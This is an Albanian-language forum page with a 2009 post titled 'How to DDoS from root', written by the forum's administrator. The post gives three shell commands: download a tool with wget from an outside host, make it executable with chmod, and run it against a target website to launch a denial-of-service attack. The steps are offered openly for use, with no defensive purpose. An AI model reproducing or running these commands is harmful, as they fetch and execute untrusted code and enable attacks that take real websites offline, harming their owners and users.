...:::Mesohu-Ks:::...
Pershendetje vizitor i nderuar...
Me sa duket, ju nuk jeni identifikuar akoma ne faqen tone, ndaj po ju paraqitet ky mesazh per tju kujtuar se ju mund te identifikoheni qe te merrni pjese ne
diskutimet dhe temat e shumta te forumit tone.

- Ne qofte se ende nuk keni nje Llogari personale ne forumin ton, mund ta hapni nje te tille duke u Regjistruar
-Regjistrimi eshte falas dhe ju merr koh maksimumi 1 min...

-Gjithsesi ju falenderojme shume, per kohen qe fute ne dispozicionper te n'a vizituar ne faqen tone.

Me Respekt dhe Kenaqesi:
Staffi i Forumit : Mesohu-ks

...:::Mesohu-Ks:::...

...:::Mesohu-Ks:::...
 
ForumPortalPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Qysh me bo dDos prej root

Shko poshtë 
AutoriMesazh
TRo0PiX
Administrator
Administrator
avatar

Numri i postimeve : 152
Join date : 21/04/2009

MesazhTitulli: Qysh me bo dDos prej root   Tue Jun 09, 2009 2:33 pm

Tash ju tregoj si me bo dDos nai faqe prej root -it

N`Root e shkrun " wget xpl.by.ru/cw7.3 " (pa thojza) edhe ja fut ENTER

Pastaj e shkrun " chmod 777 ./cw7.3 " (pa thojza) edhe ja fut ENTER .

Edhe n fund e shkrun "./cw7.3 www.webi-qi-don-me-ddos.com" (pa thojza) edhe ja fut ENTER
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
Qysh me bo dDos prej root
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
...:::Mesohu-Ks:::... :: Mesohu-ks Boxi :: Tutorials & Mesime-
Kërce tek: